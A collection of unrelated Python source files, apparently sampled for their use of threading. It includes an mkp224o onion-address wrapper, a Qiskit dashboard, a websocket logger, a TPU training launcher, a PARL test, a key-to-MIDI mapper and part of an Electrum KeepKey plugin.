obj_progress.gotoxy(100,100)
b = button(root)
b.dimension(20,10)
b.gotoxy(100, 40)
b.write("start")
b.callback(callback_func_threaded)
#obj.update(1)
#bj.vertical()
#obj.disable()
#obj.enable()
END(root)
if cb_thread:
cb_thread.exit()
cb_thread.join()
os._exit(0)
main()
|
__init__.py
|
"Python wrapper for mkp224o CLI tool."
import os
import time
import threading
from collections import defaultdict
from queue import Queue, Empty
from subprocess import Popen, PIPE, TimeoutExpired
from .version import __version__
COMMAND = os.getenv('MKP224O_PATH', 'mkp224o')
class _Mkpy224o: # pylint: disable=too-few-public-methods
def __init__(self, pattern, on_progress=None):
self._pattern = pattern
self._total_calcs = pow(32, len(pattern))
self._on_progress = on_progress
self._stats_reports = 0
self._stats = defaultdict(lambda: 0)
self._start = time.time()
def _update_stats(self, stats):
# Update totals.
self._stats_reports += 1
for key, value in stats.items():
self._stats[key] += value
# Find averages.
averages = {}
for key in ('calc/sec', 'succ/sec', 'rest/sec'):
averages[key] = self._stats[key] / self._stats_reports
averages['elapsed'] = time.time() - self._start
# Estimate time.
averages['estimate'] = self._total_calcs / averages['calc/sec']
averages['remaining'] = averages['estimate'] - averages['elapsed']
return averages
def _tail_stderr(self, stream):
def _tail():
while True:
try:
line = stream.readline()
except ValueError:
break
if line == '':
break
if not line.startswith('>'):
continue
line = line.strip().lstrip('>').rstrip('sec')
stats = {
k: float(v) for k, v in [
p.split(':') for p in line.split(', ')
]
}
stats = self._update_stats(stats)
self._on_progress(stats)
threading.Thread(target=_tail, daemon=True).start()
def __call__(self, count=1, interval=3):
cmd, keys = [
COMMAND, self._pattern, '-n', str(count), '-S', str(interval), '-y',
], []
with Popen(cmd, stdout=PIPE, stderr=PIPE, encoding='utf8') as proc:
self._tail_stderr(proc.stderr)
while True:
try:
proc.wait(0.1)
except TimeoutExpired:
continue
else:
break
# Parse our keys.
lines = iter(proc.stdout.read().split('\n'))
while True:
header = next(lines)
if header != '---':
break
args = {
'hostname': next(lines).split()[1],
'public': next(lines).split()[1],
'secret': next(lines).split()[1],
}
# Sanity check.
assert next(lines).startswith('time:')
keys.append(args)
return keys
def find_keys(pattern, count=1, on_progress=None, interval=None):
"""
Main interface for this module.
"""
return _Mkpy224o(pattern, on_progress=on_progress)(count, interval)
|
dashboard.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The core IBM Quantum dashboard launcher."""
import threading
from typing import List, Tuple, Dict, Any, Optional
import ipywidgets as wid
from IPython.core.magic import line_magic, Magics, magics_class
from IPython.display import display, Javascript
from qiskit.exceptions import QiskitError
from qiskit.tools.events.pubsub import Subscriber
from qiskit_ibm_provider.job.exceptions import IBMJobApiError
from qiskit_ibm_provider.job.ibm_job import IBMJob
from .backend_update import update_backend_info
from .backend_widget import make_backend_widget
from .job_widgets import make_clear_button, make_labels, create_job_widget
from .utils import BackendWithProviders
from .watcher_monitor import _job_monitor
from ... import IBMProvider
class AccordionWithThread(wid.Accordion):
"""An ``Accordion`` that will close an attached thread."""
def __init__(self, children: Optional[List] = None, **kwargs: Any):
"""AccordionWithThread constructor.
Args:
children: A list of widgets to be attached to the accordion.
**kwargs: Additional keywords to be passed to ``ipywidgets.Accordion``.
"""
children = children or []
super().__init__(children=children, **kwargs)
self._thread = None
# Devices VBox.
self._device_list = None # type: Optional[wid.VBox]
def __del__(self):
"""Object disposal."""
if hasattr(self, "_thread"):
try:
self._thread.do_run = False
self._thread.join()
except Exception: # pylint: disable=broad-except
pass
self.close()
def _add_device_to_list(backend: BackendWithProviders, device_list: wid.VBox) -> None:
"""Add the backend to the device list widget.
Args:
backend: Backend to add.
device_list: Widget showing the devices.
"""
device_pane = make_backend_widget(backend)
device_list.children = list(device_list.children) + [device_pane]
class IBMDashboard(Subscriber):
"""An IBM Quantum dashboard.
This dashboard shows both device and job information.
"""
def __init__(self):
"""IBM Quantum Dashboard constructor."""
super().__init__()
# A list of job widgets. Each represents a job and has 5 children:
# close button, Job ID, backend, status, and estimated start time.
self.jobs = [] # type: List
self._init_subscriber()
self.provider = None
self.dashboard = None # type: Optional[AccordionWithThread]
# Backend dictionary. The keys are the backend names and the values
# are named tuples of ``IBMBackend`` instances and a list of provider names.
self.backend_dict = None # type: Optional[Dict[str, BackendWithProviders]]
# Jobs tab on the dashboard.
self.job_viewer = None # type: Optional[wid.VBox]
self._clear_jobs_button = make_clear_button(self) # type: wid.GridBox
self._jobs_labels = make_labels() # type: wid.HBox
self.refresh_jobs_board()
def _get_backends(self) -> None:
"""Get all the backends accessible with this account."""
ibm_backends = {}
for hgp in self.provider._get_hgps():
hgp_name = "{hub}/{group}/{project}".format(
hub=hgp.credentials.hub,
group=hgp.credentials.group,
project=hgp.credentials.project,
)
for backend in hgp.backends.values():
if not backend.configuration().simulator:
if backend.name() not in ibm_backends:
ibm_backends[backend.name()] = BackendWithProviders(
backend=backend, providers=[hgp_name]
)
else:
ibm_backends[backend.name()].providers.append(hgp_name)
self.backend_dict = ibm_backends
def refresh_jobs_board(self) -> None:
"""Refresh the job viewer."""
if self.job_viewer is not None:
self.job_viewer.children = [
self._clear_jobs_button,
self._jobs_labels,
] + list(reversed(self.jobs))
def refresh_device_list(self) -> None:
"""Refresh the list of devices."""
for _wid in self.dashboard._device_list.children:
_wid.close()
self.dashboard._device_list.children = []
for back in self.backend_dict.values():
_thread = threading.Thread(
target=_add_device_to_list, args=(back, self.dashboard._device_list)
)
_thread.start()
def start_dashboard(self, provider: IBMProvider) -> None:
"""Starts the dashboard."""
self.provider = provider
self.dashboard = build_dashboard_widget()
self.job_viewer = self.dashboard.children[0].children[1]
self._get_backends()
self.refresh_device_list()
self.dashboard._thread = threading.Thread(
target=update_backend_info, args=(self.dashboard._device_list,)
)
self.dashboard._thread.do_run = True
self.dashboard._thread.start()
self.refresh_jobs_board()
def stop_dashboard(self) -> None:
"""Stops the dashboard."""
if self.dashboard:
self.dashboard._thread.do_run = False
self.dashboard._thread.join()
self.dashboard.close()
self.dashboard = None
def update_single_job(self, update_info: Tuple) -> None:
"""Update a single job instance.
Args:
update_info: Updated job info containing job ID,
status string, est time, and status value.
"""
job_id = update_info[0]
found_job = False
ind = None
for idx, job in enumerate(self.jobs):
if job.job_id == job_id:
found_job = True
ind = idx
break
if found_job:
job_wid = self.jobs[ind]
# update status
if update_info[1] == "DONE":
stat = "<font style='color:#34BC6E'>{}</font>".format(update_info[1])
elif update_info[1] == "ERROR":
stat = "<font style='color:#DC267F'>{}</font>".format(update_info[1])
elif update_info[1] == "CANCELLED":
stat = "<font style='color:#FFB000'>{}</font>".format(update_info[1])
else:
stat = update_info[1]
job_wid.children[3].value = stat
# update estimated start time.
if update_info[2] == 0:
est_start = "-"
else:
est_start = str(update_info[2])
job_wid.children[4].value = est_start
def cancel_job(self, job_id: str) -> None:
"""Cancel a job in the watcher.
Args:
job_id: ID of the job to cancel.
Raises:
Exception: If job ID is not found.
"""
do_pop = False
ind = None
for idx, job in enumerate(self.jobs):
if job.job_id == job_id:
do_pop = True
ind = idx
break
if not do_pop:
raise Exception("Job is not found.")
if self.jobs[ind].children[3].value not in ["CANCELLED", "DONE", "ERROR"]:
try:
self.jobs[ind].job.cancel()
status = self.jobs[ind].job.status()
except IBMJobApiError:
pass
else:
self.update_single_job(
(self.jobs[ind].job_id, status.name, 0, status.value)
)
def clear_done(self) -> None:
"""Clear the done jobs from the list."""
_temp_jobs = []
do_refresh = False
for job in self.jobs:
job_str = job.children[3].value
if not (
("DONE" in job_str) or ("CANCELLED" in job_str) or ("ERROR" in job_str)
):
_temp_jobs.append(job)
else:
job.close()
do_refresh = True
if do_refresh:
self.jobs = _temp_jobs
self.refresh_jobs_board()
def _init_subscriber(self) -> None:
"""Initializes a subscriber that listens to job start events."""
def _add_job(job: IBMJob) -> None:
"""Callback function when a job start event is received.
When a job starts, this function creates a job widget and adds
the widget to the list of jobs the dashboard keeps tracking.
Args:
job: Job to start watching.
"""
status = job.status()
queue_info = job.queue_info()
position = queue_info.position if queue_info else None
est_time = queue_info.estimated_start_time if queue_info else None
job_widget = create_job_widget(
self, job, job.backend().name(), status.name, position, est_time
)
self.jobs.append(job_widget)
_job_monitor(job, status, self)
if len(self.jobs) > 50:
self.clear_done()
else:
self.refresh_jobs_board()
self.subscribe("ibm.job.start", _add_job)
def build_dashboard_widget() -> AccordionWithThread:
"""Build the dashboard widget.
Returns:
Dashboard widget.
"""
tabs = wid.Tab(layout=wid.Layout(width="760px", max_height="650px"))
devices = wid.VBox(children=[], layout=wid.Layout(width="740px", height="100%"))
device_list = wid.Box(
children=[devices], layout=wid.Layout(width="auto", max_height="600px")
)
jobs_box = wid.VBox(
layout=wid.Layout(
max_width="740px", min_width="740px", justify_content="flex-start"
)
)
tabs.children = [device_list, jobs_box]
tabs.set_title(0, "Devices")
tabs.set_title(1, "Jobs")
acc = AccordionWithThread(
children=[tabs],
layout=wid.Layout(
width="auto",
max_height="700px",
),
)
acc._device_list = acc.children[0].children[0].children[0]
acc.set_title(0, "IBM Quantum Dashboard")
acc.selected_index = None
acc.layout.visibility = "hidden"
display(acc)
acc._dom_classes = ["job_widget"]
display(
Javascript(
"""$('div.job_widget')
.detach()
.appendTo($('#header'))
.css({
'z-index': 999,
'position': 'fixed',
'box-shadow': '5px 5px 5px -3px black',
'opacity': 0.95,
'float': 'left,'
})
"""
)
)
acc.layout.visibility = "visible"
return acc
@magics_class
class IBMDashboardMagic(Magics):
"""A class for enabling/disabling the IBM Quantum dashboard."""
@line_magic
def ibm_quantum_dashboard(self, line="", cell=None) -> None:
"""A Jupyter magic function to enable the dashboard."""
# pylint: disable=unused-argument
try:
provider = IBMProvider()
except Exception:
raise QiskitError("Could not load IBM Quantum account from the local file.")
_IBM_DASHBOARD.stop_dashboard()
_IBM_DASHBOARD.start_dashboard(provider)
@line_magic
def disable_ibm_quantum_dashboard(self, line="", cell=None) -> None:
"""A Jupyter magic function to disable the dashboard."""
# pylint: disable=unused-argument
_IBM_DASHBOARD.stop_dashboard()
_IBM_DASHBOARD = IBMDashboard()
"""The Jupyter IBM Quantum dashboard instance."""
|
websocket.py
|
import json
import multiprocessing
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from spectrum.conf import SPECTRUM_UUID4
from spectrum.handlers.base import BaseSpectrumHandler
from autobahn.asyncio.websocket import WebSocketClientProtocol
from autobahn.asyncio.websocket import WebSocketClientFactory
try:
import asyncio
except ImportError:
# Trollius >= 0.3 was renamed
import trollius as asyncio
queue = multiprocessing.Queue()
loop = asyncio.get_event_loop()
factory = WebSocketClientFactory()
def listener(queue, proto):
while proto.connected:
message = queue.get()
if message is not None:
proto.sendMessage(message, isBinary=False)
class SpectrumProtocol(WebSocketClientProtocol):
def onOpen(self):
self.listener = multiprocessing.Process(target=listener, args=(queue, self,))
self.listener.start()
self.listener.join()
def onConnect(self, response):
self.connected = True
print("Connected to Server: {}".format(response.peer))
def onClose(self):
self.connected = False
def worker(loop, hostname, port):
factory.protocol = SpectrumProtocol
asyncio.set_event_loop(loop)
coro = loop.create_connection(factory, hostname, port)
try:
loop.run_until_complete(coro)
loop.close()
except RuntimeError:
pass
class WebsocketSpectrum(BaseSpectrumHandler):
def __init__(self, sublevel=None, *args, **kwargs):
""" Setup """
self.url = kwargs.pop('url', 'ws://127.0.0.1:9200/?spectrum=%s' % SPECTRUM_UUID4)
self.conn_info = urlparse(self.url)
self.start(self.conn_info.hostname, self.conn_info.port)
super(WebsocketSpectrum, self).__init__(sublevel, *args, **kwargs)
def emit(self, record):
data = self.build_message(record)
payload = json.dumps(data, ensure_ascii=False).encode('utf8')
queue.put(payload)
def start(cls, hostname, port):
try:
t = threading.Thread(target=worker, args=(loop, hostname, port,))
t.start()
except RuntimeError:
pass
|
run_experiment.py
|
import atexit
import sacred
import argparse
import time
import math
import subprocess
import shutil
import os
import json
import threading
import requests
import glob
from configs import fetch_model_params
import socket
import subprocess
import queue
import sys
import signal
parser = argparse.ArgumentParser()
parser.add_argument('--tpu', type=str, required=True) # Name of TPU to train on, if any
parser.add_argument('--model', type=str, required=True) # JSON file that contains model parameters
parser.add_argument('--experiment_name', type=str, required=True) # name of experiment (will show up in omniboard)
parser.add_argument('--steps_per_checkpoint', type=int, default=5000)
parser.add_argument('--autostack', action="store_false")
parser.add_argument('--auto_layout', action="store_true")
parser.add_argument('--auto_layout_and_mesh_shape', action="store_true")
parser.add_argument('--new', action='store_true')
parser.add_argument('--test', action='store_true')
parser.add_argument('--eval', action='store_true')
parser.add_argument('--predict', action='store_true')
parser.add_argument('--no_delete_tpu', action='store_true')
parser.add_argument('--heartbeat_timeout', type=int, default=36000) # kill and restart if nothing logged to tensorboard in this many seconds
args = parser.parse_args()
params = fetch_model_params(args.model)
ex = sacred.Experiment(args.experiment_name)
ex.observers.append(sacred.observers.QueuedMongoObserver(url='127.0.0.1:27017', db_name='db', username='user', password='password'))
def get_open_port(lo=8000, hi=8100):
for i in range(lo, hi):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if s.connect_ex(('localhost', i)) != 0:
return i
def train_thread(args, tpu, id, q):
print('starting training on', tpu)
# pass binary flags through
opts = ''
for flag in ['auto_layout', 'auto_layout_and_mesh_shape', 'new', 'test', 'predict', 'eval', ]:
if args.__getattribute__(flag):
opts += ' --' + flag
for flag in ['autostack', ]:
if not args.__getattribute__(flag):
opts += ' --' + flag
cmd = "python3 main.py --tpu {tpu} --model run_configs/config_{id}.json --steps_per_checkpoint {steps_per_checkpoint} {opts} --sacred_id {run_id}".format(tpu=tpu, id=id, steps_per_checkpoint=args.steps_per_checkpoint, opts=opts, run_id=id)
print('Running:', cmd)
proc = subprocess.Popen(cmd, shell=True)
# poll until it's exited
while proc.poll() is None:
time.sleep(60)
try:
nq, *nargs = q.get_nowait()
if nq == 'kill':
print('train thread recieved kill signal from logging thread')
# first send SIGTERM
proc.terminate()
time.sleep(60)
# if it still hasn't exited, we send SIGKILL
if proc.poll() is None:
print('SIGTERM not successful, sending SIGKILL')
proc.kill()
except queue.Empty:
pass
print('exited training!')
if proc.returncode == 0:
print('exited gracefully')
os.kill(os.getpid(), signal.SIGINT)
return
if args.no_delete_tpu:
print('recreate done, exiting train_thread - not killing tpu!')
return
print("Recreating {} in 60sec...".format(tpu))
time.sleep(60)
os.system("pu recreate {} --yes --retry 3600 --retry-randomness 1.5".format(tpu))
print('recreate done, exiting train_thread')
# clear out queue
while True:
try:
q.get_nowait()
print('dropped request in queue after pu recreate')
except queue.Empty:
break
def get_json(uri, params=None, timeout=15):
resp = requests.get(uri, params=params, timeout=timeout)
resp.raise_for_status()
return resp.json()
def get_tag_sets(base_uri):
j = get_json(f'{base_uri}/data/plugin/scalars/tags', {'experiment': ''})
assert isinstance(j, dict)
return {
run: j[run].keys()
for run in j.keys()
}
def get_scalar_data(base_uri, run, tag):
j = get_json(f'{base_uri}/data/plugin/scalars/scalars', {'experiment': '', 'run': run, 'tag': tag})
assert isinstance(j, list)
return j
def get_run_data(port):
base_uri = f'http://localhost:{port}/'
r = {}
try:
tag_sets = get_tag_sets(base_uri)
runs = tag_sets.keys()
if '.' in runs:
if 'loss' in tag_sets['.']:
r['loss'] = get_scalar_data(base_uri, '.', 'loss')
if 'eval' in runs:
if 'loss' in tag_sets['eval']:
r['val_loss'] = get_scalar_data(base_uri, 'eval', 'loss')
if 'eval_lambada' in runs:
if 'lambada_acc' in tag_sets['eval_lambada']:
r['lambada_acc'] = get_scalar_data(base_uri, 'eval_lambada', 'lambada_acc')
if 'lambada_log_ppl' in tag_sets['eval_lambada']:
r['lambada_ppl'] = [
[t, s, math.exp(lp)]
for [t, s, lp] in get_scalar_data(base_uri, 'eval_lambada', 'lambada_log_ppl')
]
except:
import traceback
traceback.print_exc()
return r
@ex.main
def main(_run):
print('Starting run', _run._id)
print('experiment main invoked with argv:', " ".join(sys.argv))
print('WARNING: please remember to remove old metric log files from the model directory.')
os.makedirs('run_configs', exist_ok=True)
shutil.copy(args.model if args.model.endswith('.json') else 'configs/{}.json'.format(args.model), 'run_configs/config_{}.json'.format(_run._id))
tensorboard_port = get_open_port()
print('Tensorboard at port:', tensorboard_port)
print('Tensorboard url: ', 'http://eleutherai.bmk.sh:'+ str(tensorboard_port))
os.system("screen -S tensorboard_{} -d -m bash -c 'tensorboard --logdir {} --port {} --bind_all --reload_multifile=true || tensorboard --logdir {} --port {} --reload_multifile=true'".format(_run._id, params["model_path"], tensorboard_port,params["model_path"], tensorboard_port,))
atexit.register(goodbye, _run._id)
curr_step = {}
seen_predictions = set()
while True:
last_tb_log_time = time.time()
q = queue.Queue()
trainthd = threading.Thread(target=train_thread, args=(args, args.tpu, _run._id, q))
trainthd.start()
while trainthd.is_alive():
time.sleep(60)
print('Polling tensorboard for metrics...')
data = get_run_data(tensorboard_port)
for k in data.keys():
for ts, step, val in data[k]:
if step <= curr_step.get(k, -1):
continue
_run.log_scalar(k, val, step)
if k == 'loss':
_run.log_scalar('tb_ts', ts, step)
print('Logged to sacred: step={},loss={},tb_ts={}'.format(step, val, ts))
# found something new, so logging!
last_tb_log_time = time.time()
curr_step[k] = step
for f in glob.glob('predictions_{}_*'.format(_run._id)):
if f in seen_predictions:
continue
print('collecting prediction file', f)
ex.add_artifact(f)
seen_predictions.add(f)
# collect eval metrics from jsonl
if os.path.exists(f'eval_{_run._id}.jsonl'):
with open(f'eval_{_run._id}.jsonl') as fh:
for line in fh:
ob = json.loads(line)
val_step = ob['global_step']
val_task = ob['task']
for metr in ob.keys():
k = 'fs.' + val_task + '.' + metr
if metr in ['task', 'global_step']: continue
if val_step <= curr_step.get(k, -1): continue
_run.log_scalar(k, ob[metr], val_step)
curr_step[k] = val_step
if time.time() - last_tb_log_time > args.heartbeat_timeout:
# the run hasn't logged in a while, so we restart it
q.put(('kill',))
# give training thread some time to do its thing and recreate tpu
while trainthd.is_alive():
print('logging thread waiting for killing stalled run and for tpu recreate to finish')
time.sleep(60)
if args.no_delete_tpu:
break
def goodbye(id):
print("You are now leaving the Python sector.")
print("Sie verlassen den pythonischen Sektor.")
os.system("screen -S tensorboard_{} -X quit".format(id))
if __name__ == '__main__':
for file in glob.glob("**/*", recursive=True):
if file.split('.')[-1] in ['py']:
print('Adding', file, 'to sacred')
ex.add_source_file(file)
ex.add_config({
'tpu_name': args.tpu,
**params
})
ex.run()
|
get_set_attribute_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import parl
import numpy as np
import time
import threading
import random
from parl.remote.client import disconnect
from parl.utils import logger
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.utils import get_free_tcp_port
@parl.remote_class
class Actor(object):
def __init__(self, arg1, arg2, arg3, arg4):
self.arg1 = arg1
self.arg2 = arg2
self.arg3 = arg3
self.GLOBAL_CLIENT = arg4
def arg1(self, x, y):
time.sleep(0.2)
return x + y
def arg5(self):
return 100
def set_new_attr(self):
self.new_attr_1 = 200
class Test_get_and_set_attribute(unittest.TestCase):
def tearDown(self):
disconnect()
def test_get_attribute(self):
port = get_free_tcp_port()
logger.info("running:test_get_attirbute")
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 1)
arg1 = np.random.randint(100)
arg2 = np.random.randn()
arg3 = np.random.randn(3, 3)
arg4 = 100
parl.connect('localhost:{}'.format(port))
actor = Actor(arg1, arg2, arg3, arg4)
self.assertTrue(arg1 == actor.arg1)
self.assertTrue(arg2 == actor.arg2)
self.assertTrue((arg3 == actor.arg3).all())
self.assertTrue(arg4 == actor.GLOBAL_CLIENT)
master.exit()
worker1.exit()
def test_set_attribute(self):
port = get_free_tcp_port()
logger.info("running:test_set_attirbute")
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 1)
arg1 = 3
arg2 = 3.5
arg3 = np.random.randn(3, 3)
arg4 = 100
parl.connect('localhost:{}'.format(port))
actor = Actor(arg1, arg2, arg3, arg4)
actor.arg1 = arg1
actor.arg2 = arg2
actor.arg3 = arg3
actor.GLOBAL_CLIENT = arg4
self.assertTrue(arg1 == actor.arg1)
self.assertTrue(arg2 == actor.arg2)
self.assertTrue((arg3 == actor.arg3).all())
self.assertTrue(arg4 == actor.GLOBAL_CLIENT)
master.exit()
worker1.exit()
if __name__ == '__main__':
unittest.main()
|
KeyMidiMapper.py
|
import time
import csv
from distutils.util import strtobool #文字列→bool型変換で使用
import threading
#外部ライブラリ
import rtmidi
from pyhooked import Hook, KeyboardEvent, MouseEvent
#自作ライブラリ
import KeyMidiGui as kmGui
class MapData():
def __init__(self):
self.mapData = []
self.valData = {}
self.ptime = time.time()
def addMap(self, key, channel, CCNumber, shift=False, ctrl=False, alt=False ,method='set', value=63):
self.mapData.append({
'key':key,
'channel':channel,
'CCNumber':CCNumber,
'shift':shift,
'ctrl':ctrl,
'alt':alt,
'method':method,
'value': value
})
cc_key = self.calcCCkey(channel, CCNumber)
if cc_key not in self.valData:
self.valData.update({cc_key:value})
def readMapData(self, filePass):
return None
def calc_interval(self):
ntime = time.time()
sub = ntime - self.ptime
self.ptime = ntime
return 1.0 + 0.25/max(0.0001,(sub-0.020))
def calcCCkey(self, channel, CCNumber):
return (channel << 8) + CCNumber
def checkHandleEvent(self, args):
if args.event_type != 'key down':
return None
for data in self.mapData:
if(data['key'] != args.current_key):
continue
if(data['shift'] != ('Lshift' in args.pressed_key or 'Rshift' in args.pressed_key)):
continue
if(data['ctrl'] != ('Lctrl' in args.pressed_key or 'Rctrl' in args.pressed_key)):
continue
if(data['alt'] != ('Lalt' in args.pressed_key or 'Ralt' in args.pressed_key)):
continue
cc_key = self.calcCCkey(data['channel'], data['CCNumber'])
ch = 0xB0 + data['channel']
if(data['method'] == 'inc'):
self.valData[cc_key] += int(data['value']*self.calc_interval())
self.valData[cc_key] = min(127,self.valData[cc_key])
elif(data['method'] == 'dec'):
self.valData[cc_key] -= int(data['value']*self.calc_interval())
self.valData[cc_key] = max(0, self.valData[cc_key])
elif(data['method'] == 'set'):
self.valData[cc_key] = data['value']
return [ch, data['CCNumber'], self.valData[cc_key]]
return None
class KeyMapper():
def __init__(self):
self.mapdata = MapData()
self.myGui = kmGui.mainGui()
#rtmidiのセットアップ
self.midiout = rtmidi.MidiOut()
self.available_ports = self.midiout.get_ports()
self.myGui.setup(self.available_ports, self.midiout)
if self.available_ports:
self.midiout.open_port(1)
else:
self.midiout.open_virtual_port("My virtual output")
#設定ファイルの読み込み
filePass = self.myGui.getFilePass()
if(filePass == ""):
return
with open(filePass) as f:
reader = csv.reader(f)
rowList = [row for row in reader]
for l in rowList[1:]:
self.mapdata.addMap(
l[0],
int(l[1]),
int(l[2]),
strtobool(l[3]),
strtobool(l[4]),
strtobool(l[5]),
l[6],
int(l[7])
)
#Guiループ
#self.myGui.guiLoop()
def __del__(self):
del self.midiout
def guiLoop(self):
self.myGui.run()
return
def handle_events(self,args):
if isinstance(args, KeyboardEvent):
map_event = self.mapdata.checkHandleEvent(args)
if(map_event != None):
self.midiout.send_message(map_event)
if __name__ == "__main__":
mapper = KeyMapper()
hk = Hook() # hookインスタンス作成
hk.handler = mapper.handle_events # コールバック関数をハンドラに登録
thread_1 = threading.Thread(target=hk.hook)
thread_1.setDaemon(True)
thread_1.start()
mapper.guiLoop()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Florincoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
